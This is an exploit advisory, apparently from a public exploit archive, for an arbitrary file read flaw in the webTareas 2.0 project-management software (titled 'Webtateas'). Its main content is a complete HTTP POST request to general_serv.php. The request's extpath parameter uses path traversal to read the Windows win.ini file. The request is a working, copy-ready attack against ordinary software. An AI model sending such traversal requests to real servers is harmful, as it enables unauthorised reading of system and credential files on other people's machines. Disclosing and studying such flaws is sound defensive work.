Webtateas 2.0 Arbitrary File Read

Webtateas version 2.0 suffers from an arbitrary file read vulnerability.


MD5 | 3c621d3f3c33d8e5d13f939c960681a2

# Exploit Title: Webtateas 2.0 - Arbitrary File Read
# Date: 2020-04-12
# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd.
# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php
# Software Link: http://webtareas.sourceforge.net/general/home.php
# Version: Webtateas v2.0
# Tested on: Windows
# CVE : N/A

Vulnerable Request:
POST /webtareas/includes/general_serv.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 72
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/webtareas/general/home.php?
Cookie: webTareasSID=k2vicb6pn9gsajncg3l6ltbver
DNT: 1

action=cardview-actions&prefix=..%2F&extpath=../../../../Windows/win.ini

Related Posts